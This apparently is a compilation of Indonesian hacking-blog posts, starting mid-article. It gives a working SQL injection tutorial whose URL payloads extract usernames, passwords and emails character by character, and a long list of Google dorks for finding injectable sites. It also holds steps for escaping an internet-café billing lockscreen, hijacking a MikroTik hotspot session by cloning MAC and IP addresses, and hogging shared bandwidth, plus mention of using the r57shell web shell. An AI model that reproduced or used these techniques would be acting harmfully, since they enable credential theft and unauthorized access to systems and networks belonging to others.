menyelesaikannya kita bisa tampilkan secara bersamaan dengan menggunakan fungsi concat(), contoh Code: http://www.site.com/news.php?id=5 union all select 1,concat(user,0x3a,pass,0x3a,email) from users/* maka kita akan mendapatkan user : pass : email from table users. contoh: admin:hash:whatever@blabla.com.. finish untuk bagian pertama, sekarang kita masuk ke bagian kedua yang agak sulit :) 2 Blind SQL Injection Blind SQL Injection sedikit lebih rumit dari pada classic injection tapi ini dapat terselesaikan. banyak sekali tutorial sql injection yang sangat bagus dari xprog, itu tidak buruk untuk coba membacanya.kita masuk ke tutorial. misal kita memiliki target Code: http://www.site.com/news.php?id=5 . ketika kita mengaksesnya maka akan artikel-artikel di halaman tersebut,gambar atau yang lainnya.. kita coba untuk test site ini dengan serangan blind sql injection. Code: http://www.site.com/news.php?id=5 and 1=1 <-- ini akan selalu menghasilkan nilai TRUE. dan halaman akan menampilkan artikel secara normal. sekarang coba test seperti Code: http://www.site.com/news.php?id=5 and 1=2 <-- ini akan menghasilkan nilai FALSE jika beberapa text, gambar atau beberpa isi hilang maka site tersebut vulrnable untuk blind sql injecjtion. -= dapatkan versi MySQL untuk mendapatkan versi MySQL kita gunakan substring.. contoh Code: http://www.site.com/news.php?id=5 and substring(@@version,1,1)=4 maka ini akan mengembalikan nilai TRUE jika versi mysql adalah 4. ganti 4 dengan 5, dan jika query mengembalikan nilai true saat telah diganti dengan 5 maka versi mysql adalah 5 contoh Code: http://www.site.com/news.php?id=5 and substring(@@version,1,1)=5 -= test jika subselect berkerja ketika SELECT tidak bisa berkerja maka kita gunakan subselect contoh Code: http://www.site.com/news.php?id=5 and (select 1)=1 jika halaman tampil secara normal itu berarti subselect berkerja.kita dapat melihat bahwa kita bisa akses ke mysql.users contoh Code: http://www.site.com/news.php?id=5 and (select 1 from mysql.user limit 0,1)=1 jika halaman ditampilkan normal maka kita punya akses ke mysql.user dan seletah itu kita bisa mengeluarkan beberapa password menggunakan fungsi load_file() dan OUTFILE -= cek nama table dan nama kolom bagian ini adalah bagian dimana tebak menebak menjadi teman baik contoh Code: http://www.site.com/news.php?id=5 and (select 1 from users limit 0,1)=1 (dengan limit 0,1 query kita disini mengembalikan 1 baris dari data, karena subselect hanya mengembalikan 1 baris, ini sangat penting) lalu jika halaman ini berjalan normal tanpa ada bagian dari isi yang hilang, maka table dengan nama user ada. jika kamu mendapatkan FALSE(ada bagian artikel yang hilang), rubah saja nama table sampai kamu menebak dengan benar. katakan saja kita sudah menemukan bahwa tablenya bernama users, sekarang yang kita butuhkan adalah nama kolom. sama seperti tabel name. kita mulai menebak. seperti yang saya bilang sebelumnya coba menebak dengan nama-nama yang umum untuk kolom. contoh Code: http://www.site.com/news.php?id=5 and (select substring(concat(1,password),1,1) from users limit 0,1)=1 jika halaman tampil normal maka kita tahu bahwa nama kolomnya adalah password (jika salah maka coba dengan nama umum atau coba menebak saja) disini kita menggabungkan angka satu dengan nama kolom password lalu substring akan mengembalikan karakter pertama (,1,1) -= Mengambil data dari database kita temukan table users dengan kolom username dan password selanjutnya kita akan mengambil karakter-karakter dari sana. Code: http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>80

ini adalah pengambilan karakter pertama dari user pertama dalam table users. substring disini akan mengembalikan karakter pertama dan panjangnya 1 karakter. ascii() mengconvert 1 karakter itu ke dalam nilai ASCII dan membandinnya dengan menggunakan simbol lebih besar. jadi jika karakter ascii lebih besar dari 80,maka halaman akan menampilkan artikel secara normal. ini berarti bernilai TRUE maka lakukan hingga mendapat nilai FALSE. contoh
Code:
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>95

kita masih mendapat nilai TRUE, tetap naikan terus.
Code:
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>98

TRUE lagi,tambah lagi.
Code:
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>99

FALSE!!!
jadi karakter pertama dalam username adalah char(99). menggunakan converter ascii kita tau bahwa char(99) ada lah huruf 'c'.
sekarang kita cek karakter ke dua.
Code:
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>99

Note kita saya ganti ,1,1 menjadi ,2,1 untuk mendapatkan karakter ke 2. (sekarang dia akan mengembalikan karakter ke dua dan 1 karakter panjangnya)
Code:
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>99

TRUE,halaman masih normal.tambah lagi.
Code:
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>107

FALSE, kurangi angkanya.
Code:
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>104

TRUE, tambah lagi.
Code:
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>105

FALSE!!!
sekarang kita tahu bahwa karakter ke dua adalah char(105) dan itu adalah 'i'. kita punya 'ci' jadi untuk lebih jauhnya lagi maka tetaplah menambah sampai akhir.(ketika >0 nilai nya FALSE maka kita tau kita sudah di akhir). ada banyak tool untuk Blind SQL Injection, saya pikir sqlmap yang terbaik, tapi saya melakukan dengan manual. karena itu akan menjadikan mu lebih lihai dalam SQL INJECTION.

Saya harap kamu bisa mempelajari sesuatu dari tutorial ini
Selamat bersenang senang.

Cracking Caesarsoft Billing

Sebelumnya saya ijin maaf ato apalah yg laen klo udah repost… Cuma pingin berbagi tips n trik cara membobol billing warnet khususnya CAESARSOFT*

Sebenernya caranya cukup simple. kita log in id n pass username menggunakan administrator. tapi perlu digaris bawah klo cara ini “masih” ada kemungkinan ketauan. klo OPnya teliti cz waktu kita uda log in pake pass admin. di billing client ga kelacak alias ga ada user yg maket itu komp…jadi waspadalah !! ^^

Okelah tanpa panjang pendek. gini caranya :
1. Pastiin kita telah masuk login screennya Cyber Billing
2. Tekan key : Windows + U, trus kita masuk Utility Manager
3. Pilih menu Help
4.Klo sdh masuk help pagenya, Klik kanan di windows bar
5. Pilih Jump to URL..
6. Ketik ke C: buat masuk ke systemnya… trus modif aja sesuai keinginan (bisa jg lgsg masuk buat internetan gratis. Tapi cm pake IE aja..)

Selamat berkreasi. artikel ini saya tulis hanya untuk berbagi ilmu aja. Dari rasa penasaran yg akhirnya jadi ugal-ugalan… Tapi sesuai pepatah “ga ada yang aman didunia ini”….

Basic Mikrotik Hotspot Hacking

Satu lagi cara berinternet gratis yaitu dengan meng-hack hotspot mikrotik. Sebenarnya cara ini sudah basi, tetapi karena baru saja saya mempraktekan maka saya tulis langkah-langkahnya. Disamping untuk mengingat kalau lupa kan bisa untuk sharing buat yang lain, yang mungkin belum tahu atau masih kurang paham. Biasanya kalau kita terhubung dengan hotspot mikrotik maka kita akan dihadapkan dengan menu mikrotik login sebelum kita bisa browsing.
Cara ini adalah untuk mem-by pass mikrotik login, sebenarnya lebih tepat kalau disebut cloning client. Intinya kita tidak harus login dulu untuk bisa browsing, karena target sudah login. Kita sebagai clone-nya jadi tidak perlu login. Trik ini hanya bisa jalan selama client yang kita clone masih terhubung ke hotspot.

Berikut langkah-langkahnya :

1. Download dulu program Netcut, program ini untuk mengetahui MAC address yang terhubung dengan kita. Netcut bisa didownload disini.
2. Koneksikan komputer kita dengan hotspot mikrotik
3. Jalankan program Netcut
4. Pilih LAN Card / NIC yang kita gunakan dengan mengklik menu Choice NetCard
5. Kemudian klik OK kembali ke layar utama, pilih salah satu network yang terkoneksi yang akan kita jadikan target (dalam contoh ini yang menjadi target adalah network dengan IP 192.168.182.18). Yang jelas bukan network kita atau network server.
6. Salin IP address dan MAC address, bisa juga dengan mengklik PrintTable kemudian blok dan copy paste ke notepad untuk langkah selanjutnya.
7. Setelah dipaste di notepad langkah selanjutnya edit nilai MAC address, pada contoh ini [00:26:5E:60:81:1C]. Hilangkan tanda [:] sehingga menjadi 00265E60811C. Nilai ini yang akan kita gunakan untuk merubah MAC address kita.
8. Selanjutnya kita disable dulu wireless LAN kita. Kemudian buka properties wireless LAN dan ubah nilai Local Administration MAC Network, default kosong. Isi dengan nilai tadi, pada contoh ini 00265E60811C
9. Kemudian kita set IP wireless LAN kita dengan IP yang sama yaitu 192.168.182.18 dan isi juga DNS server address.

Untuk DNS server address bisa dicek sebelum kita merubah MAC dan IP. Jadi waktu pertama kali kita terhubung ke hotspot, dengan cara mengetik perintah dari command prompt
C:\>ipconfig/all
10. Langkah terakhir adalah meng-enable kembali wireless LAN kita. Sekarang kita bisa browsing tanpa harus ijin pada yang punya hotspot.
11. Hasil :
Sebelum melakukan clone

Sesudah melakukan clone

Tutorial ini hanya untuk mereka yang malas bertanya username dan password pada admin jaringan. Malu bertanya tidak bisa browsing.

Wireless LAN Scanner

WLAN Scanner Hardware
WiSPY-Tools

Wi-SPY is a USB 2.4GHz spectrum analyzer by MetaGeek LLC. WiSPY-Tools are a set of open-source tools for supporting the device. They are known to work on Linux and OSX, and ought to work on BSD variants. The drivers are written as user-space interfaces to LibUSB.
WLAN Finders and Profile Configurators
WiFi Radar

WiFi Radar is a Python/PyGTK2 utility for managing WiFi profiles. It enables you to scan for available networks and create profiles for your preferred networks. At boot time, running WiFi Radar will automatically scan for an available preferred network and connect to it. You can drag and drop your preferred networks to arrange the profile priority.
Ozroc's Stupid Wireless Assistant also for X - OSWAX

oswax is a simple wireless assistant that works without X! Of course, using dialog made us really easy to allow using Xdialog so its implemented as an option. It scans for networks with iwlist and makes a menu for connecting to networks, it supports DHCP, macchanger, WEP keys and it can generate fast connection scripts for favourite networks.
wlanScanner

wlanScanner lists available networks, with data like signal strength, encryption status and connection speed.
Wellenreiter

Wellenreiter is a GTK/Perl program that makes the discovery and auditing of 802.11b wireless networks much easier. All three major wireless cards (Prism2, Lucent, and Cisco) are supported. It has an embedded statistics engine for the common parameters provided by wireless drivers. Its scanner window can be used to discover access-points, networks, and ad-hoc cards. It detects essid broadcasting or non-broadcasting networks in every channel. The manufacturer and WEP is automaticly detected. A flexible sound event configuration lets you work in unattended environments. An ethereal / tcpdump-compatible dumpfile can be created for the whole session. GPS is used to track the location of the discovered networks immediately. Automatic associating is possible with randomly generated MAC addreses. Wellenreiter can reside on low-resolution devices that can run GTK/Perl and Linux/BSD (such as iPAQ or Zaurus). Uniq Essod-bruteforcer is now included too. License: GNU General Public License (GPL) OS: Linux, BSD
WifiScanner

WifiScanner is an analyzer and detector of 802.11b stations and access points. It can listen alternatively on all the 14 channels, write packet information in real time, can search access points and associated client stations, and can generate a graphics of the architecture using GraphViz. All network traffic can be saved in the libpcap format for post analysis. It works under Linux with a PrismII card and with the linux-wlan driver.
Kismet

Kismet is an 802.11b network sniffer and network dissector. It is capable of sniffing using PRISM 2 or Linux-kernel supported wireless cards, automatic network IP block detection via UDP, ARP, and DHCP packets, Cisco equipment lists via Cisco Discovery Protocol, weak cryptographic packet logging, and Ethereal and tcpdump compatible packet dump files. Works on Linux PDAs, too.

kismet2html is a PHP script that reads all Kismet CSV log files from a directory and merges them together. The output is an HTML page with listing of BSSIDs, SSIDs, and interesting statistical details (which channel is used the most, encrypted networks, etc.)
WeWiMo

WeWiMo (Web WiFi Monitor) is a script for monitoring computers connected to access point running Linux and hostap WiFi card driver (ZCom XI-626).
wavemon

wavemon is a ncurses-based monitor for wireless devices. It allows you to watch the signal and noise levels, packet statistics, device configuration, and network parameters of your wireless network hardware. It has currently only been tested with the Lucent Orinoco series of cards, although it should work (with varying features) with all devices supported by the wireless kernel extensions written by Jean Tourrilhes.
XNetworkStrength

XNetworkStrength is a tool to visually track wireless connectivity between a laptop and a local access point (AP). It uses only the X11 windowing system for its graphics, and should compile on any Linux system.
d3vscan

d3vscan is a network manager that is able to uniquely identify and graphically plot network and bluetooth devices to provide a higher degree of understanding of a particular network. It is also simple enough to be used by an average end user.
Wlan FE

WlanFE is a GTK+ based GUI frontend for the wlan-ng 802.11b wireless networking driver for Linux. It allows you to change your SSID, your Channel, between Infrastructure and Ad-Hoc mode, and more.
wlanmeter

wlanmeter monitors signal/noise/link levels on all available wireless interfaces. You can watch 3 interfaces at the same time.
aeswepd

aeswepd is a Linux AES rekeying daemon for IEEE 802.11 WEP.
wlandetect

wlandetect is a very simple Perl script that checks which access points and other peers can be reached and executes some commands based on what it has found. It is very useful if you often switch between various wireless environments.
iStumbler

iStumbler is a small utility for finding local wireless networks and services. iStumbler combines a compact Aqua user interface with advanced wireless scanning and reporting.
Prismstumbler

Prismstumbler is software which finds 802.11 (W-LAN) networks. It comes with an easy to use GTK2 frontend and is small enough to fit on a small portable system. It is designed to be a flexible tool to find as much information about wireless LAN installations as possible. Because of its client-server architecture the scanner engine may be used for different frontends.
airfinder

airfinder helps to locate a specific wireless MAC address physically, or at least to detect the presence of a specific MAC address.
MWavelan

MWavelan is a kernel network device driver for the WaveLAN/IEEE wireless network card, which supports signal strength reading from all the access points in range, plus some more features.
RogueScanner

RogueScanner is a network security tool for automatically discovering rogue wireless access points by scanning a wired network. In addition to finding access points, it will classify all discovered network devices.
WEP/WPA Key Decryption
AirSnort

AirSnort is a wireless LAN (WLAN) tool which recovers encryption keys. AirSnort operates by passively monitoring transmissions, computing the encryption key when enough packets have been gathered.
Karmaa Wireless Client Security Assessment Tools

KARMA is a set of tools for assessing the security of wireless clients at multiple layers. Wireless sniffing tools discover clients and their preferred/trusted networks by passively listening for 802.11 Probe Request frames. From there, individual clients can be targetted by creating a Rogue AP for one of their probed networks (which they may join automatically) or using a custom driver that responds to probes and association requests for any SSID. Higher-level fake services can then capture credentials or exploit client-side vulnerabilities on the host.
wpa-buddy

wpa-buddy is a tool to decrypt WPA-PSK protected traffic, given the passphrase. It can work in real-time (sniffing packets from a network interface) or in batch mode (reading packets from a capture file). It also produces nice output telling you what's going on. wpa-buddy currently supports WPA and WPA2.
Aircrack-ng

aircrack-ng is a set of tools for auditing wireless networks. It's an enhanced/reborn version of aircrack. It consists of airodump (an 802.11 packet capture program), aireplay (an 802.11 packet injection program), aircrack (static WEP and WPA-PSK cracking), airdecap (decrypts WEP/WPA capture files), and some tools to handle capture files (merge, convert, etc.).
WepAttack

WepAttack is a WLAN open source Linux tool for breaking 802.11 WEP keys. This tool is based on an active dictionary attack that tests millions of words to find the right key. Only one packet is required to start an attack.
Wepdecrypt

Wepdecrypt is a wireless LAN tool based on wepattack that guesses WEP keys using an active dictionary attack, a key generator, a distributed network attack, and some other methods.
Weplab

Weplab is a tool to review the security of WEP encryption in wireless networks from an educational point of view. Several attacks are available, so it can measure the effectiveness and minimum requirements of each one. Currently, weplab supports several methods, and it is able to crack the WEP key from 600,000 encrypted packets.
Security
WIDZ

WIDZ (Wireless Intrusion Detection System) is an IDS for 802.11. It guards APs and monitors local frequencies for potentially malevolent activity. It can detect scans, association floods, and bogus APs, and it can easily be intergrated with SNORT or Realsecure.
Other Resources

* Linux and Mobile AdHoc Networks - MANETs
* Linux and WLANs
* Linux and WireLess Communities
* Linux applications for wireless access points

Mempercepat Akses Internet Anda Dengan Cara Manual




Menambah Kecepatan Internet dengan GPEDIT

Banyak tips dan trik untuk mempercepat koneksi internet. Saya coba cara yang satu ini dan hasilnya lumayan, memang lebih cepet.
Caranya dengan mengubah setting bandwith pada windows

Pada dasarnya OS windows sudah membatasi bandwidth untuk koneksi internet sebanyak 20% dari total bandwidth yang seharusnya bisa maksimal, Jika anda ingin menambah bandwidth internet supaya koneksinya terasa lebih cepat dan kencang bisa dengan cara mengurangi atau mengosongkan batasan bandwidth tersebut supaya pada Windows kita bisa maksimal dalam menggunakan bandwidth yang sudah ada.

Ikuti petunjuknya seperti dibawah ini :
1. Klik Start
2. Klik Run
3. Ketik gpedit.msc
4. Kemudian klik Ok
5. Setelah masuk klik Administrative Templates
6. Kemudian Klik Network
7. Setelah terbuka klik QoS Packet scheduler
8. Kemudian klik Limit Reservable Bandwidth
9. Dan setelah terbuka ubah setting menjadi Enable
10. Kemudian ubah Bandwidth Limitnya menjadi 0
11. Klik Apply,ok
12. Kemudian keluar dan Restart computer

Mempercepat memakai REGISTRY
Jika problem anda koneksi sering putus dan nambahin kecepatan acces, silahkan coba cara ini :
1. Silahkan masukkan ke menu REGEDIT
2. Kemudian masuk ke HKEY_LOCAL_MACHINE->System->CurrentControlSet->Services->NetBT->Parameters.
Klik dua kali TransportBindName, kemudian hapus nama atau angka yang tertera pada kolom.
3. Kemudian masuk ke HKEY_LOCAL_MACHINE->Software->Microsoft->OLE, pada string EnableDCOM nilai Y di ubah menjadi N.
Tutup Menu Regedit kemudian Restart komputer anda.

Memakai Firefox pada koneksi internet Dial-UP
Jika Anda pernah ngerasain pake internet untuk browsing tetep LEMOT ABIS, download juga pelan banget, nah sekarang masalah itu mungkin bisa teratasi dengan cara ini, caranya adalah :
1. Buka Browser Mozilla Firefox
2. Pada Address Bar ketik : about:CONFIG
3. Cari string yang nilainya akan dirubah.
Contoh merubahnya :
network.http.pipelining à FALSE ====> klik kanan “Toggle” menjadi === TRUE
network.http.pipelining.maxrequests à 64
network.http.proxy.pipelining === TRUE
network.proxy.share_proxy_settings === FALSE <== ini harus FALSE 4. Untuk yang belum tersedia stringnya, buat string baru caranya : Klik kanan ditempat kosong, NEW — INTEGER Contohnya : nglayout.initialpaint.delay === 0 5. Kemudian REFRESH atau Tekan F5 6. Pada Address Bar ketik : about:BLANK 7. Klik menu: Untuk OS Windows XP TOOLS — OPTIONS — WEB FEATURES Untuk OS Linux ( Vector ) EDIT — PREFERENCES Untuk Setting yang berbeda di beberapa OS EDIT — ADVANCED 8. Pada option : ALLOW WEB SITES TO INSTALL SOFTWARE beri tanda Check Box untuk mengaktifkan. 9. Kemudian tekan OK lalu REFRESH ( F5 ) 10. Download software SwitchProxy Tool di alamat : https://addons.mozilla.org/extension 11. Setelah selesai jangan tekan tombol UPDATE 12. Klik Tanda X (tutup)yang ada di pojok kanan atas dari POP UP Window yang muncul 13. Tutup semua browser Mozilla FireFox, 14. Kemudian buka lagi untuk mengaktifkan software SwitchProxy Tool yang sudah di install tadi 15. Kalo instalasi sukses, akan muncul Toolbar tambahan di bawah toolbar navigasi & Address Bar. 16. Sekarang browser mozilla siap untuk digunakan.

Catatan :
- Software SwitchProxy Tool ini selain untuk mengganti Proxy secara otomatis di Browser Mozilla FireFox, Engine-nya juga berpengaruh terhadap kecepatan koneksi Internet.
- Cara ini sangat efektif bila digunakan di warnet yang padat pengunjung untuk menyedot Bandwidth ( mayoritas kecepatan akses Internet ) ke komputer yang sedang anda pakai.
- Perubahan yang signifikan terjadi pada koneksi Internet dengan BROADBAND / VSAT.
Berikut ini kode-kode yang dirubah untuk meningkatkan bandwidth pada mozilla firefox jika menggunakan modem jenis Dial Up….
browser.cache.disk_cache_ssl === TRUE
browser.xul.error_pages.enabled === TRUE
content.interrupt.parsing === TRUE
content.max.tokenizing.time === 3000000
content.maxtextrun === 8191
content.notify.backoffcount === 5
content.notify.interval === 750000
content.notify.ontimer === TRUE
content.switch.threshold === 750000
network.http.max-connections === 32
network.http.max-connections-per-server === 8
network.http.max-persistent-connections-per-proxy === 8
network.http.max-persistent-connections-per-server === 4
network.http.pipelining === TRUE
network.http.pipelining.maxrequests === 8
network.http.proxy.pipelining === TRUE
nglayout.initialpaint.delay === 750
plugin.expose_full_path === TRUE
signed.applets.codebase_principal_support === TRUE

Tips tambahan :
Disable IPv6 di Firefox digunakan untuk menambah kecepatan load page, soalnya hampir semua site sudah nggak pake IPv4.
Caranya :
Buka Firefox
Ketik: about:CONFIG à (enter)
Cari: Network.dns.disableIPv6 à dirubah menjadi “TRUE”
NB.: nglayout.initialpaint.delay bisa dirubah dengan nilai 0 sampai 300. Ada juga yg set 30. Tergantung kebutuhan. Coba dari 0 dulu, baru nanti kalau nggak ada perubahan naikan bertahap sampai 300 sampai pada nilai yang dirasa memuaskan…

Jangan lupa untuk restart Mozilla FireFoxnya setelah disetting agar settingannya bekerja

SQL DORK

inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:Stray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:ogl_inet.php?ogl_id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurl:pages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurl:shop.php?do=part&id=
inurl:productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:pop.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:page.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:pages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:offer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:Stray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:ogl_inet.php?ogl_id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurl:pages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurl:shop.php?do=part&id=
inurl:productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:pop.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:page.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:pages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:offer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=

Video Cara membuat Server mIRC ( Pakek injector r57shells )

Buat Server IRC Pakek Shells Inject ( lewat r57shells )
Hahahahaa.. Nih aku coba² bikin video buat server IRC lewat r57shells.
langsung aja sedoott di bawah ini gan :P :P

http://www.mediafire.com/?99jja512rd4s6ea

Install Unrealircd ( Server mIRC )

Menginstal unreal sebenarnya mudah saja, bahkan menurut saya fitur2 nya lebih lengkap di bandingkan jenis IRCD yg lainnya, berikut saya berikan sedikit tutorial menginstal IRCD dengan Unreal :
- masuk ke shells root account anda, kemudian berikan command :
[root@reload-x.us] wget http://www.cooperativabiosphaera.it/punk/Unreal3.2.8.1.tar.gz

- extract file tersebut :
[root@reload-x.us] tar -zxvf Unreal3.2.8.1.tar.gz

-masuk ke direktory unreal :
[root@reload-x.us] cd Unreal3.2

- lakukan proses configurasi :
[root@reload-x.us/Unreal3.2.8.1] ./Config

Installing 17% <-- tekan enter seterusnya sampai 100% terdapat beberapa pilihan : ==[ ADDITIONAL INFO ]== * See ChangeLog [Enter to continue] Do you want to enable the server anti-spoof protection? [No] -> enter
What directory are all the server configuration files in?
[/usr/local/reload-x.us/Unreal3.2/] -> enter
What is the path to the ircd binary including the name of the binary?
[/usr/local/reload-x.us/Unreal3.2/src/ircd] -> enter
Would you like to compile as a hub or as a leaf?
Type Hub to select hub and Leaf to select leaf.
[Hub] -> enter
What is the hostname of the server running your IRCd? -> enter
What should the default permissions for your configuration files be? (Set this to 0 to disable)
It is strongly recommended that you use 0600 to prevent unwanted reading of the file
[0600] - > enter
Do you want to support SSL (Secure Socket Layer) connections?
[No] -> enter
Do you want to enable IPv6 support?
[No] -> enter
Do you want to enable ziplinks support?
[No] -> enter
Do you want to enable remote includes?
[No] -> enter
Do you want to enable prefixes for chanadmin and chanowner?
This will give +a the & prefix and ~ for +q (just like +o is @)
Supported by the major clients (mIRC, xchat, epic, eggdrop, Klient, PJIRC, etc.) with the notable exceptions of irssi, KVIrc and CGI:IRC.
This feature should be enabled/disabled network-wide.
[No] -> enter
What listen() backlog value do you wish to use? Some older servers
have problems with more than 5, others work fine with many more.
[5] -> enter
How far back do you want to keep the nickname history?
[2000] -> enter
What is the maximum sendq length you wish to have?
[3000000] -> enter
How many buffer pools would you like?
This number will be multiplied by MAXSENDQLENGTH.
[18] -> enter
